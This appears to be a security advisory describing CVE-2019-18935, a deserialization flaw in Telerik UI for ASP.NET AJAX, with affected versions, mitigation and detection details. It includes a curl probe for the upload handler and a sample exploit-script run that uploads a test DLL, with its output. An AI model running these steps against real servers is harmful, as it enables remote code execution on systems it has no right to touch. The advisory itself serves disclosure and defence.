Summary:
In the start of May 2020, a mischievous exploit has been out in the wild that uses two CVEs in combination to perform insecure deserialization to a vendor named Telerik. The vulnerability lies in a suite of UI components for web applications called Telerik UI for ASP.NET AJAX. The insecure deserialization of JSON objects results in arbitrary remote code execution on the software’s host. It’s a typical Microsoft Windows exploit. An unrestricted file upload vulnerability (CVE-2017-11317), the deserialization vulnerability itself, and mixed mode assemblies, mixtures to form CVE-2019-18935.
Description:
A file handler named RadAsyncUpload in Telerik UI for ASP.NET AJAX is the main component of this exploit ,that enables uploading files asynchronously i.e., without reloading.
The configuration details of file handling lies in Telerik’s encrypted rauPostData ,POST parameter, that contains a serialized object. Those who would be able to break the encryption protecting the configuration object in rauPostData, they could:
- Modify the type of the object in rauPostData, allowing them to control the object’s behavior while it’s being deserialized. This issue (CVE-2019-18935) is the main subject of this post.
- The rauPostData contains both the serialized configuration object and the object’s type. AsyncUploadHandler uses the type specified within rauPostData to prepare .NET’s Deserialize() method to properly deserialize the object.
An attacker would likely manipulate Telerik.Web.UI.AsyncUploadConfiguration type within rauPostData, and upload POST request specifying the type as an RCE gadget. Herein uploadinf a malicious mixed mode assembly DLL, an attacker may sends a second request to force JavaScriptSerializer to deserialize an object of type System.Configuration.Install.AssemblyInstaller. When deserialized, this will cause the application to load the malicious DLL into its current domain. As long as the mixed mode assembly DLL is of the same architecture as the loading process, its entry-point function DLLMain() will be called when the DLL is loaded.
Before attempting to exploit Telerik UI for ASP.NET AJAX, confirm first that the file upload handler is registered:
*****************************************************************************curl -sk <HOST>/Telerik.Web.UI.WebResource.axd?type=rau
{ “message” : “RadAsyncUpload handler is registered succesfully, however, it may not be accessed directly.” }
*****************************************************************************
In preparing to fully compromise a remote host with a reverse shell, one can initially verify the deserialization vulnerability by uploading and loading a simple mixed mode assembly DLL that causes the web application to sleep for 10 seconds. A simple program, sleep.c, will do just that.
The exploit script leverages the core RadAsyncUpload encryption logic provided by RAU_crypto.py to craft an encrypted rauPostData POST parameter; this enables access to the vulnerable AsyncUploadHandler class through which we can upload files and deserialize arbitrary object types. This script also ensures that each uploaded file has a unique name on disk.
**************************************************************************
python3 CVE-2019-18935.py -u <HOST>/Telerik.Web.UI.WebResource.axd?type=rau -v <VERSION> -f ‘C:\Windows\Temp’ -p sleep_2019121205271355_x86.dll
[*] Local payload name: sleep_2019121205271355_x86.dll
[*] Destination folder: C:\Windows\Temp
[*] Remote payload name: 1576142987.918625.dll
{‘fileInfo’: {‘ContentLength’: 75264,
‘ContentType’: ‘application/octet-stream’,
‘DateJson’: ‘1970-01-01T00:00:00.000Z’,
‘FileName’: ‘1576142987.918625.dll’,
‘Index’: 0},
‘metaData’: {‘AsyncUploadTypeName’: ‘Telerik.Web.UI.UploadedFileInfo, ‘
‘Telerik.Web.UI, Version=<VERSION>, ‘
‘Culture=neutral, ‘
‘PublicKeyToken=<TOKEN>’,
‘TempFileName’: ‘1576142987.918625.dll’}}
[*] Triggering deserialization…
<title>Runtime Error</title>
<span><H1>Server Error in ‘/’ Application.<hr width=100% size=1 color=silver></H1>
<h2> <i>Runtime Error</i> </h2></span>
…omitted for brevity…
[*] Response time: 13.01 seconds
**************************************************************************
Affected Products:
Telerik UI for ASP.NET AJAX Q1 2011 (2011.1.315) to R3 2019 (2019.3.917)
Advisory:
https://www.telerik.com/support/kb/aspnet-ajax/details/allows-javascriptserializer-deserialization
Mitigation:
Telerik has updated the patch and released for CVE-2019-18935.
Qualys customers can scan their network with QID(s)# 372327 to detect vulnerable assets. Kindly continue to follow on Qualys Threat Protection for more coverage on vulnerabilities.
References and Sources:
- https://know.bishopfox.com/research/cve-2019-18935-remote-code-execution-in-telerik-ui
- https://www.telerik.com/forums/asyncuploader-issue
- https://github.com/noperator/CVE-2019-18935/tree/master/RAU_crypto